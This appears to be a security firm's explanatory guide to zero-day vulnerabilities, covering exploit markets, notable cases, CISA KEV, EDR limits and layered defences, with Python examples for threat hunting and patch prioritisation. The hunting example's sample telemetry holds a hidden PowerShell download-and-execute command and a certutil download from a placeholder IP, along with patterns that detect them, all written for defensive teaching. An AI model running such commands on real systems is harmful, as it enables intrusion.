A zero-day vulnerability is a software flaw unknown to the vendor, or known but still without an available patch, that is already being exploited or can be exploited at any moment while the victim has no standard way to defend. The "day zero" label refers to exactly that: the vendor, and therefore the defender, has had zero days to prepare. There is no update, no updated antivirus signature, no published IDS rule. For the defender, the only defence window is whatever generic controls were already in place, not a specific response to the concrete flaw.
This guide explains what falls within the zero-day concept, the full life cycle, the difference from n-day, the real market (official bug bounty, gray market and black market), who buys and what for, representative public cases, the role of the CISA KEV catalogue, why a modern EDR does not guarantee detection, the defences that work against unknown flaws, the disclosure ethics debate and a reasonable prioritisation for companies that are not nation-state targets.
Key takeaways on zero-day
- Zero-day is a vulnerability with no public patch available, exploited or exploitable at any moment.
- The life cycle has seven phases: discovery, exploitation, vendor notification, patch development, disclosure, rollout and residual exploitation until the last patched system.
- There is an official market (bug bounty), a gray market (Zerodium, Crowdfense) with public six and seven figure prices, and a black market in closed forums.
- CISA KEV is the operational list of vulnerabilities with confirmed exploitation, and any organisation should treat it as a higher priority than a CVSS score on its own.
- EDR does not always detect zero-day because payload and technique are new; real defence is depth in layers, not a single product.
What a zero-day vulnerability actually is
A zero-day vulnerability meets at least one of these conditions:
- The vendor does not know about the flaw. The finder keeps it private or is exploiting it actively without notifying.
- The vendor knows but has not published a patch yet. The window between notification and public patch is operational zero-day from the defender's point of view.
- A patch exists but details are not public and it is being used in the wild before most organisations have updated. Some sources consider this zero-day broadly, others talk about immediate n-day.
What distinguishes a zero-day from any other vulnerability: there is no public CVE advisory, there is no specific signature in EDR, IDS or WAF, there is no patch to apply. The only mitigations are configuration, disabling the vulnerable component or generic compensating controls.
Zero-day life cycle
The full life cycle goes through seven phases.
Discovery. Someone finds the flaw: academic researcher, bug bounty team, independent hunter, state offensive team or criminal attacker. The motivation and destination define the next phase.
Exploitation in the wild. If whoever finds it is offensive, they start using it in real operations. Targets are usually limited at first to avoid burning the exploit.
Vendor notification. When a responsible researcher or detection team identifies the flaw, they notify the vendor through a responsible disclosure channel. The vendor response clock starts.
Patch development. The vendor reproduces the flaw, designs the fix and tests it to avoid regressions. Typical timelines range from days for mature vendors to months for complex components.
Disclosure. Coordinated publication of the patch, technical advisory and CVE. Some researchers publish proof of concept a few days later to encourage urgent patching.
Patch rollout. Organisations receive the patch and start the internal cycle of testing, maintenance window and deployment. In critical environments it takes weeks or months.
Ongoing exploitation. As long as an unpatched system accessible to the attacker remains, the flaw is still exploitable. EternalBlue (2017), Log4Shell (2021) or ProxyShell (2021) still appear in recent incident reports.
Zero-day vs n-day vs known vulnerability
| Concept | Patch available | Public details | Operational risk |
|---|---|---|---|
| Zero-day | No | No, or only among attackers | Maximum, no specific defence possible |
| Recent n-day | Yes | Yes, with or without public exploit | High if not patched in a reasonable window |
| Old n-day | Yes | Yes, included in tools | Medium, depends on exposure and time since publication |
| Known vulnerability without exploitation | Yes | Yes, no observed criminal activity | Low, standard maintenance priority |
The practical difference between zero-day and recent n-day is smaller than it looks for an organisation with slow patch management. An opportunistic attacker exploiting a three-week-old n-day against an unpatched system has the same effect as a sophisticated actor with an exclusive zero-day: control of the asset.
Zero-day market
The real zero-day market splits across three channels with different clients, prices and rules.
Official bug bounty
Official programmes pay researchers for reporting flaws directly to the vendor:
- HackerOne and Bugcrowd. Multi-client platforms with thousands of active programmes (Shopify, GitHub, Uber and similar).
- Apple Security Bounty (complemented by the Security Research Device Program, which lends research iPhones to selected researchers). iOS and macOS research with rewards from five to seven figures depending on severity and exclusivity.
- Microsoft Bug Bounty Programs. Family of programmes by product (Azure, Windows, M365, Edge) with public tables.
- Google Vulnerability Reward Programs. Separate programmes cover Android, Chrome, Google infrastructure and open-source projects Google depends on.
Official payments are below the gray market but offer legality, public reputation and long-term relationship with the vendor.
Gray market
Legal companies that buy zero-days and sell them mostly to governments and agencies. Their activity generates constant ethical debate:
- Zerodium. Pioneer in publishing prices. Public table with six and seven figure payments for full exploit chains in iOS, Android, Chrome, Safari, Edge.
- Crowdfense. Company based in the Emirates that competes with Zerodium with similar tables.
- Trenchant (L3Harris). Offensive capabilities for allied government clients.
Publicly reported prices for persistent iOS chains have reached the million-dollar range depending on vendor and exclusivity. Chrome RCE with sandbox escape moves in the hundreds of thousands.
Black market
Closed forums in clearnet and dark web where exploits are bought and sold without ethical or legal filters. Clients: ransomware operators, APT groups not aligned with legal gray buyers, initial access brokers. Prices below gray market because of higher legal and quality risk.
Who buys zero-days and what for
Buyers fall into three categories.
Nation-state offensive. Intelligence and defence agencies of world and regional powers. The exploits sustain intelligence operations, surveillance of defined targets and offensive capability in cyber warfare. The distinction between legitimate use against terrorism or crime and abuse against journalists, activists and opposition is one of the open debates in the sector.
Defensive vendors and security providers. Some buy zero-days to research and improve detection in their products. Initiatives like Trend Micro's Zero Day Initiative buy vulnerabilities, report them to the vendor and publish coordinated advisories.
Academic and private researchers. Researchers whose destination is an official bug bounty, or consultancies building internal capability for advanced pentesting and Red Team. As a rule they do not buy exploits from third parties; they discover them themselves.
Representative public cases
Stuxnet (2010). Worm attributed to a joint operation by the United States and Israel against Iranian nuclear enrichment infrastructure. It used four Windows zero-days simultaneously, an exceptional fact that evidenced the level of investment behind it. It is the founding case of the zero-day-as-state-weapon era.
NSO Group's Pegasus. Spyware delivered through zero-click iMessage exploit chains documented by Citizen Lab and Amnesty Tech. Publicly identified targets include journalists, activists and government members. FORCEDENTRY (2021, analysed in depth by Project Zero together with Citizen Lab) and BLASTPASS (2023, documented by Citizen Lab) are the best-known examples of those chains.
Annual Pwn2Own. Contest sponsored by Zero Day Initiative where researchers demonstrate zero-day exploits against browsers, operating systems, vehicles and IoT devices. Immediate vendor report under ZDI coordinated disclosure.
Chrome V8 series. V8, Chrome's JavaScript engine, has been a recurring target of zero-days exploited in the wild. Google publishes Chrome release bulletins confirming active exploitation of specific engine flaws.
CISA KEV catalogue
The Known Exploited Vulnerabilities catalogue maintained by CISA lists vulnerabilities with confirmed in-the-wild exploitation. Inclusion forces federal civilian agencies to patch within deadlines set by directive BOD 22-01.
For a private organisation, KEV is an operational reference for three reasons: it selects observed rather than theoretical risk (a CVE with CVSS 9.8 and no observed exploitation is less urgent than a CVSS 7.5 included in KEV), it provides an indicative patching deadline (the federal due date) and it offers continuous free coverage.
Combined with EPSS (Exploit Prediction Scoring System, a statistical probability that a CVE will be exploited in the next 30 days), KEV lets patching be prioritised quantitatively rather than by CVSS alone.
Why EDR does not always detect zero-day
A modern EDR detects threats through a combination of signatures, heuristics, behaviour and, in recent suites, machine learning models. Against a zero-day it can fail for several reasons.
- New payload. The specific binary, script or byte string is not in threat intelligence bases. Signatures do not trigger.
- New technique. The sequence of system calls or memory operations does not match known behaviour patterns. Heuristics do not raise an alert.
- Kernel-level and privilege escalation. Exploits living in the kernel or exploiting signed drivers have the capacity to manipulate the EDR itself before generating useful telemetry.
- Living off the land. If the exploit uses only legitimate system binaries after achieving execution, post-exploit activity can look like normal administration.
- Speed. Some advanced chains compromise the system and exfiltrate data within minutes. Even if the EDR detects something late, the damage is already done.
The operational conclusion is not that EDR is useless, but that it is not a single sufficient defence against advanced actors with zero-day capability. More detail in EDR vs XDR vs MDR and EDR evasion with LLM.
Defences against unknown zero-day
If the attacker uses a flaw nobody knows, defence is layered depth assuming each layer can fail.
Virtual patching via WAF and IPS. Generic rules that block anomalous traffic patterns associated with exploit families, not specific CVEs. Useful to gain time while the official patch arrives. More context in what is a WAF.
Defence in depth and assume breach. No individual control decides the outcome. If the attacker crosses the first layer, the second contains them, the third detects them, the fourth limits the damage.
Behaviour-based EDR and UEBA. Anomalous behaviour analysis for users and endpoints, not only signatures. Detects secondary indicators even when the initial payload is invisible.
Application allowlisting. Only authorised software runs. AppLocker, Windows Defender Application Control or per-application sandboxing drastically reduce the useful surface of an exploit.
Least privilege. If the compromised user or service has no administrative permissions, the blast radius is limited unless the attacker chains a local privilege escalation.
Network segmentation. Lateral movement is difficult when segments are isolated with strict policies and real zero trust between zones.
Proactive threat hunting. Active search for indicators in telemetry without waiting for alerts. More in what is threat hunting.
Monitoring of CISA KEV and high EPSS. Patching priority based on real exploitation and statistical probability, not only CVSS.
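The behaviour-based detection and threat-hunting layers above, and the living-off-the-land case in the EDR section, come down to rules about what a process does rather than what its bytes look like. The following is an added example (not code from the original article or from any EDR vendor): three parent/child and command-line heuristics run over constructed process-creation telemetry. The field names, hostnames, users and the 203.0.113.x address are assumptions made for the example.

```python
"""Behaviour-based hunting over process telemetry (added example, constructed data).

Rules fire on parent/child relationships and command-line shape, not on a
payload hash, which is why they can still catch post-exploitation activity
when the initial exploit is unknown:
  1. an Office/document application spawning a script host or shell
  2. PowerShell launched with an -EncodedCommand (decoded for the analyst)
  3. certutil used as a download/decode LOLBin
"""
import base64
import re
from dataclasses import dataclass

# Constructed telemetry. Field names are assumptions, not any vendor's schema.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')".encode("utf-16le")
).decode()

SAMPLE_TELEMETRY = [
    {"ts": "2024-05-02T09:14:01Z", "host": "ws-017", "user": "alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"ts": "2024-05-02T09:14:07Z", "host": "ws-017", "user": "alice",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENCODED_PAYLOAD}"},
    {"ts": "2024-05-02T09:20:33Z", "host": "ws-017", "user": "alice",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.bin x.bin"},
    {"ts": "2024-05-02T09:31:10Z", "host": "ws-022", "user": "bob",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"ts": "2024-05-02T09:32:00Z", "host": "ws-022", "user": "SYSTEM",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# -e / -ec / -enc / -encodedcommand (PowerShell accepts any unambiguous prefix) + base64
ENC_CMD = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
CERTUTIL_ABUSE = re.compile(r"(?i)\s-(urlcache|decode|encode)\b")


@dataclass
class Finding:
    rule: str
    host: str
    user: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_powershell(b64: str) -> str:
    """EncodedCommand carries base64 of UTF-16LE text; surface it to the analyst."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def evaluate(event: dict) -> list:
    """Apply all rules to a single process-creation event."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    found = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        found.append(Finding("office_spawns_script_host", event["host"], event["user"],
                             f"{parent} -> {image}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        m = ENC_CMD.search(cmd)
        if m:
            found.append(Finding("powershell_encoded_command", event["host"], event["user"],
                                 decode_powershell(m.group(1))))
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        found.append(Finding("certutil_lolbin", event["host"], event["user"], cmd))
    return found


def hunt(events: list) -> list:
    return [f for e in events for f in evaluate(e)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_TELEMETRY):
        print(f"[{f.rule}] {f.host} {f.user}: {f.detail}")
```

Nothing in these rules references the exploit that got the attacker into Word in the first place, and that is the point: the three findings on ws-017 cluster on one host and one user within minutes, which is the secondary indicator a hunter pivots on. The benign PowerShell on ws-022 is not flagged because it carries no encoded command, and the rules are deliberately narrow to keep that false-positive rate low; in production the same logic runs against the EDR's own process-creation feed rather than a list.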
Disclosure ethics
Google's Project Zero publishes 90 days after notifying the vendor, with a 14-day grace period if a patch is scheduled to ship within it, and since 2021 a further 30-day patch-adoption window before technical details are released. The deadline is aggressive but it has helped professionalise the response of large manufacturers.
Classic responsible disclosure does not set an automatic deadline. Researcher and vendor negotiate the publication date based on patch complexity.
Immediate full disclosure is a minority view today. Publishing a working exploit without an available patch is considered irresponsible except in exceptional cases.
Zero Day Initiative acts as intermediary: pays the researcher, reports to the vendor, sets a deadline and publishes a coordinated advisory.
For companies that are not nation-state targets
Most organisations, including large companies not strategic for state intelligence, are not realistic targets for actors with exclusive zero-day capability. Reasonable priority:
- Agile patching of n-days in CISA KEV. Most exploit incidents use vulnerabilities for which a patch had been available for weeks or months.
- Basic hardening. Secure default configuration, MFA, segmentation, least privilege.
- Functional detection and response. EDR on every endpoint, with a SOC (internal or MDR) that responds in hours.
- Immutable backups and a tested response plan.
Obsessing over exclusive zero-days while critical n-days have gone unpatched for months is bad investment. The exception is sectors targeted by advanced operations: defence, critical infrastructure, telecommunications, systemic finance, politics and dissidence.
Frequently asked questions
Is an SMB a realistic target for zero-day?
Almost never for exclusive zero-day. Actors with that capability reserve the exploit for high-value targets. An SMB is a target for recent unpatched n-day or for opportunistic ransomware campaigns that exploit vulnerabilities published weeks ago. That is the real priority.
Is buying zero-day illegal?
It depends on jurisdiction and buyer. Buying in a regulated gray market (Zerodium, Crowdfense) from a government is legal in many countries. Buying in the black market to use against third parties without authorisation is a crime in any jurisdiction with a modern penal code. For a private Spanish company, the legal path is in-house bug bounty or hiring an internal or external Red Team with authorised scope.
Is virtual patching really effective?
It is partial defence useful to gain time. It works well for flaws in web applications behind a modern WAF, with rules covering the exploit family. It does not replace the real patch. An organisation should not operate indefinitely with virtual patch as the only measure, but using the days-to-weeks window until the official patch is justified.
Can Pegasus be on my smartphone?
For private citizens not targeted by state intelligence, the statistical probability is very low. For journalists covering sensitive topics, activists, political opposition, government members or human rights defenders, the probability rises and there are forensic indicators published by Citizen Lab and Amnesty Tech that help verify. The Mobile Verification Toolkit is the reference tool for analysis.
Does EDR machine learning detect zero-day?
Sometimes. The models detect anomalous behaviours similar to known families. They can trigger on new techniques that share patterns with historical techniques. They do not reliably detect sophisticated chains designed specifically to evade them. The ML layer is complement, not guarantee.
Is CISA KEV better than CVSS for prioritising?
For operational prioritisation, yes. CVSS measures theoretical severity of the flaw, KEV confirms real observed exploitation. A vulnerability with CVSS 7.5 included in KEV is a higher priority than one with CVSS 9.8 without documented exploitation. The recommended combination is KEV + EPSS + asset context (exposure, business criticality).
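Turning the KEV + EPSS + asset-context rule, stated in the CISA KEV section and again in this answer, into an actual ranking is a small amount of code. The following is an added example (not code from the original article, CISA or FIRST): a scoring function applied to a constructed KEV-style feed, constructed EPSS probabilities and four constructed findings. The field names follow the layout of the public KEV JSON feed, but every entry, hostname and the `CVE-EXAMPLE-*` identifiers are synthetic placeholders, not real CVEs, and the weights are an assumption to be tuned per organisation.

```python
"""KEV + EPSS + asset context prioritisation (added example, constructed data)."""
from dataclasses import dataclass
from datetime import date

# Constructed KEV-style feed. Field names mirror the public KEV JSON layout;
# the entries and CVE-EXAMPLE-* identifiers are synthetic placeholders.
KEV_FEED = {
    "vulnerabilities": [
        {"cveID": "CVE-EXAMPLE-2", "dateAdded": "2024-05-01", "dueDate": "2024-05-22",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-EXAMPLE-4", "dateAdded": "2024-04-10", "dueDate": "2024-05-01",
         "knownRansomwareCampaignUse": "Unknown"},
    ]
}
# Constructed EPSS probabilities (0..1) in the shape the EPSS data gives them.
EPSS = {"CVE-EXAMPLE-1": 0.02, "CVE-EXAMPLE-2": 0.91,
        "CVE-EXAMPLE-3": 0.004, "CVE-EXAMPLE-4": 0.60}


@dataclass
class Finding:
    cve: str
    cvss: float
    asset: str
    exposure: str   # "internet", "internal" or "isolated"
    critical: bool  # business-critical asset


# Constructed scanner output: note the two CVSS 9.8 findings that are NOT in KEV.
FINDINGS = [
    Finding("CVE-EXAMPLE-1", 9.8, "build-srv-03", "internal", False),
    Finding("CVE-EXAMPLE-2", 7.5, "vpn-gw-01", "internet", True),
    Finding("CVE-EXAMPLE-3", 9.8, "web-shop-02", "internet", True),
    Finding("CVE-EXAMPLE-4", 6.5, "file-srv-07", "internal", False),
]

# Assumed weights: confirmed exploitation dominates, EPSS adds up to 50,
# CVSS acts as a tie-breaker, exposure and criticality scale the result.
EXPOSURE_WEIGHT = {"internet": 2.0, "internal": 1.0, "isolated": 0.5}


def kev_index(feed: dict) -> dict:
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def score(f: Finding, kev: dict, epss: dict) -> float:
    s = 0.0
    entry = kev.get(f.cve)
    if entry:
        s += 100.0
        if entry.get("knownRansomwareCampaignUse") == "Known":
            s += 20.0
    s += 50.0 * epss.get(f.cve, 0.0)
    s += f.cvss
    s *= EXPOSURE_WEIGHT[f.exposure]
    if f.critical:
        s *= 1.5
    return round(s, 1)


def prioritise(findings: list, feed: dict, epss: dict, today: date) -> list:
    """Rank findings by score and attach the KEV due date / overdue flag."""
    kev = kev_index(feed)
    rows = []
    for f in findings:
        entry = kev.get(f.cve)
        due = date.fromisoformat(entry["dueDate"]) if entry else None
        rows.append({
            "cve": f.cve, "asset": f.asset, "cvss": f.cvss,
            "epss": epss.get(f.cve, 0.0), "kev": entry is not None,
            "kev_due": due.isoformat() if due else None,
            "overdue": bool(due and due < today),
            "score": score(f, kev, epss),
        })
    rows.sort(key=lambda r: r["score"], reverse=True)
    return rows


if __name__ == "__main__":
    for r in prioritise(FINDINGS, KEV_FEED, EPSS, date(2024, 5, 10)):
        print(f"{r['score']:>6}  {r['cve']}  cvss={r['cvss']}  epss={r['epss']}  "
              f"kev={r['kev']}  due={r['kev_due']}  overdue={r['overdue']}  {r['asset']}")
```

With these weights the CVSS 7.5 VPN gateway in KEV lands at the top and the CVSS 9.8 build server with no observed exploitation at the bottom, which is exactly the ordering the answer above argues for; the internal file server is second because its KEV due date has already passed. The weights are the part to argue about, not the shape of the calculation.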
Related resources
- What is a CVE: standard identifier on which advisories are published and the vulnerability cycle is tracked.
- What is an exploit: code or technique that turns a vulnerability, zero-day or n-day, into operational effect.
- What is EDR: endpoint detection and response, a fundamental layer but not sufficient against advanced zero-day.
- What is threat hunting: active search for indicators that helps discover zero-day activity before official signatures.
- EDR vs XDR vs MDR: comparison of managed detection and response models.
- EDR evasion with LLM: how generative models are changing the economics of evasion and what it implies for defence.
Vulnerability management programme with Secra
At Secra we work with clients on three complementary fronts to zero-day risk. First, design and review of vulnerability management programmes with prioritisation by CISA KEV and EPSS, real metrics of time to patch and virtual patching policies coordinated with the operations team. Second, Red Team exercises that empirically validate whether defensive controls detect exploitation of recent n-days and patterns equivalent to zero-day through living off the land techniques. Third, consulting on defence-in-depth architecture for sectors with high-risk profile: segmentation, least privilege, application allowlisting and response model. If your organisation wants to measure its real exposure to actively exploited vulnerabilities, write to us through contact or check our Red Team service.
About the author
Secra Solutions team
Ethical hackers with OSCP, OSEP, OSWE, CRTO, CRTL and CARTE certifications, 7+ years of experience in offensive cybersecurity, and authors of CVE-2025-40652 and CVE-2023-3512.